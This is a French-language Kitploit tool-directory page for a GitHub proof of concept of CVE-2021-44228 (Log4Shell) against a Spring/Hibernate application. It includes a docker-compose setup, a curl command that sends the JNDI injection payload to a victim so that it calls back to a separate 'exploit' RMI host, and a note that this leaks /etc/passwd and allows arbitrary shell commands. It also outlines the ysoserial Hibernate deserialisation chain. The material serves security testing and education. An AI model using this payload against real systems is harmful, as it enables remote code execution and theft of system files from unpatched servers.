Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-44228--spring-hibernate — CVE-2021-44228 POC - Spring / Hibernate | Kitploit
Outils/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

Voir le dépôt
16il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

POC CVE-2021-44228 - Spring / Hibernate

Ce POC utilise Spring / Hibernate, cependant une approche similaire de rmi -> désérialisation pourrait être utilisée pour déclencher n'importe quelle vulnérabilité de désérialisation

TL;DR

$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

Vous devriez voir le contenu de /etc/passwd de la victime apparaître dans les logs du conteneur attacker. Vous pouvez remplacer la commande dans le service exploit pour exécuter n'importe quelle commande shell sur la victime.

Victime

La victime exécute une application spring starter standard avec les dépendances "Spring Data JPA" (pour Hibernate), "Spring Web" et "H2" (comme base de données). Seules 2 modifications ont été apportées en plus :

  1. Suppression des tests
  2. Remplacement du logger slf4j par le log4j vulnérable

Toutes les dépendances sont à jour. Aucun flag magique n'est activé.

La victime expose un endpoint POST sur / qui enregistre la requête.

Exploit

L'exploit repose sur un fork de ysoserial utilisant le générateur d'exploit Hibernate. Pour que l'exploit fonctionne avec la dernière version d'Hibernate, nous devons recompiler ysoserial.

Télécharger l’outil